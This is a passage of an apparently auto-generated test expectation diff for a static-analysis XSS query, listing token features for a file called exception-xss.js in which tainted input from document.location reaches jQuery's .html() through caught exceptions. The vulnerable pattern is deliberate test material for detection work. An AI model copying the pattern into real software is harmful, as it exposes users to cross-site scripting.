foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:18:11:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:18:11:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:7 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:7 | inner | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:7 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:7 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:7 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | inner(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | inner(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | inner(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | inner(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:3:15:12 | inner(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:9:15:11 | foo | CalleeFlexibleAccessPath | inner | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:9:15:11 | foo | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:9:15:11 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:9:15:11 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:9:15:11 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:9:15:11 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:15:9:15:11 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:16:11:16:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:3:17:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:5:17:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:5:17:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:5:17:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18818,6 +127934,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:17:5:17:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:5:17:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:5:17:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:13:17:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:13:17:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:13:17:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:13:17:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:17:13:17:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:18:17:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:18:17:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:18:17:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18825,6 +127946,27 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:17:18:17:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:18:17:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:17:18:17:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:9 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | exceptional return of unknown(foo + "bar") | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | exceptional return of unknown(foo + "bar") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | exceptional return of unknown(foo + "bar") | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | exceptional return of unknown(foo + "bar") | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | exceptional return of unknown(foo + "bar") | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | unknown(foo + "bar") | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | unknown(foo + "bar") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | unknown(foo + "bar") | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | unknown(foo + "bar") | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:3:21:22 | unknown(foo + "bar") | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:13 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:13 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:13 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:13 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:13 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:13 | foo | stringConcatenatedWith | -endpoint- 'bar' | | autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:21 | foo + "bar" | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:21 | foo + "bar" | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:21 | foo + "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18832,6 +127974,52 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:21 | foo + "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:21 | foo + "bar" | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:21:11:21:21 | foo + "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:17:21:21 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:17:21:21 | "bar" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:17:21:21 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:17:21:21 | "bar" | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:17:21:21 | "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:21:17:21:21 | "bar" | stringConcatenatedWith | foo -endpoint- | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:22:11:22:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e 